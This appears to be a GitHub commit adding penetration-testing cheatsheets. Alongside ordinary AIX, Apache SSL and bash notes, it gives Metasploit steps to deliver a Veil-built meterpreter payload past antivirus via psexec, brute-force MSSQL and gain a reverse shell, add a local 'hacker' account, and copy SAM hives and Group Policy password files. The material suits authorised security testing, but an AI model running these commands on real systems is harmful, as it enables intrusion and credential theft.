Skip to content

Commit

Permalink
Initial commit
Browse files Browse the repository at this point in the history
  • Loading branch information
OlivierLaflamme committed Aug 2, 2018
0 parents commit c8e147e
Show file tree
Hide file tree
Showing 46 changed files with 2,697 additions and 0 deletions.
2 changes: 2 additions & 0 deletions .gitattributes
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
# Auto detect text files and perform LF normalization
* text=auto
37 changes: 37 additions & 0 deletions Cheatsheet_AIXBuild.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
loslevel:
--------

Reports back on installed service pack, maintenance etc. levels of the AIX deployment.
Most of these appear to return absolutely nothing or loads of information.

oslevel (reports back the overall AIX version e.g. 6.1.0.0)
oslevel -q (reports back known maintenance levels on the host)
oslevel -rq (reports back known Recommended Maintenance Levels, think major releases)
oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack)

e.g.
oslevel -s -g 6100-08-03-1339

lslpp:
------

Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself

e.g.
lslpp -l (lists all packages, most recent level and state of them)
The package names can be passed back to it for more info, showing their patch management/application cycle.

e.g.
lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte

rpm:
----

Standard redhat package manager, has turned up on a few machines.

rpm -qa
rpm -qa --last
These will report back packages installed by rpm and when.

Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag:
e.g. find /home/ -perm 777
14 changes: 14 additions & 0 deletions Cheatsheet_AVBypass.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
1. Generate executable using Veil.

2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit
37 changes: 37 additions & 0 deletions Cheatsheet_ApacheSSL.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
# Enabling Self signed certificates on local website

1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self signed SSL certificates:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available creating a symbolic link

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

5. Edit the file default-ssl.conf

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Change the following lines to point to the certs:

SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key

6. Restart Apache

sudo /etc/init.d/apache2 restart

More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
21 changes: 21 additions & 0 deletions Cheatsheet_AttackingMSSQL.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
[+] Attacking MSSQL with Metasploit

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate MSSQL Database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

129 changes: 129 additions & 0 deletions Cheatsheet_BashScripting.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,129 @@
Simple Bash Scripting Cheatsheet
--------------------------------

[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.

[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file

[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp

[+] How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.

[+] pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.

[+] Processes
ps aux Show all running process for all users.
kill -9 PID Nicely kill a PID.

[+] Word Count
wc -l tmp2 Count the number of lines in a file

[+] cut
-d delimiter
-f fields

[+] sort
Sort by unique sort -u file
sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address

[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.

[+] grep
grep -v Remove a single string.
grep -v 'red' file

[+] egrep -v
Remove multiple strings egrep -v '(red|white|blue)' file

[+] sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.

[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"




Bash Scripts
------------

[+] Simple bash script:
#!/bin/bash
clear
echo
echo
print "Hello world."

[+] Make a file executable.
chmod +x file
chmod 755 file

[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip

[+] User Input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain

[+] Check For No User Input
if [ -z $domain ]; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
exit
fi

[+] For loops
#!/bin/bash

for host in $(cat hosts.txt)
do
command $host
done

[+] One Liners

Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
140 changes: 140 additions & 0 deletions Cheatsheet_BuildReviews.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,140 @@
Build Review Cheatsheet
-----------------------

[+] Main tasks:

Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign Eicar test file.
USB policy and removable media access (including firewire, CD etc).
Disk encryption (if relevant)
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).

[+] Windows Hosts:

[+] Server Roles
[+] Server Manager
[+] System Properties
[+] Default Domain Policy
[+] Global Domain Policy

[+] Net accounts/Users/groups/Administrators
[+] IPConfig/Routing

[+] Installed Programs
[+] Installed System Updates
[+] AV Version/Definition Dates
[+] Check Computer folders

[+] Firewall Configuration
[+] Audit Policy
[+] Password/Lockout Policy
[+] Security Policy
[+] User Rights Policy

[+] Lanman Parameters (HKLM - System - Current Control - Services - LanmanServer - Parameters)
[+] LSA (HKLM - System - Current Control - Control - LSA)
[+] MSV (HKLM - System - Current Control - Control - LSA - MSV1_0)

systeminfo command

BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)

Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update

Anti-Virus
- config
- logs
- version
- dates
- EICAR

cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\IP address_or_host name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist

mount usb
usb autostart

copy over files
- nc
- enum
- nmap
- DIRE
- EICAR

# SAM files in backtrack
/Windows/System32/config/SAM SECURITY SYSTEM

# mounting on desktop review
# mount <target> <mydir>
# sda1 = client hdd, sdb2 = my usb part 2
# mkdir /mnt/client-hdd
# mount /dev/sda1 /mnt/client-hdd
# mkdir /mnt/win-usb
# mount /dev/sdb2 /mnt/win-usb

hosts file C:\Windows\System32\drivers\etc\hosts.txt

SYSVOL GPO preference item, check for obscured passwords in xml
http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx

The history file is readable by any authenticated user, as shown below:
C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml
The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user:
\\Domain_Controller\sysvol\Domain_Name\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml


[+] Unix Based Hosts:

hostname
whoami
uname -a
cat /etc/lsb-release
dmesg | grep Linux
cat /etc/passwd
cat /etc/sudoers
netstat -antup
ps -aux
ps aux | grep root
crontab -l
/sbin/ifconfig -a
iptables -L
arp -e
cat ~/.bash_history
cat ~/.ssh/authorized_keys
mount

- Check installed applications
- Check installed compilers/interpreters
Loading

0 comments on commit c8e147e

Please sign in to comment.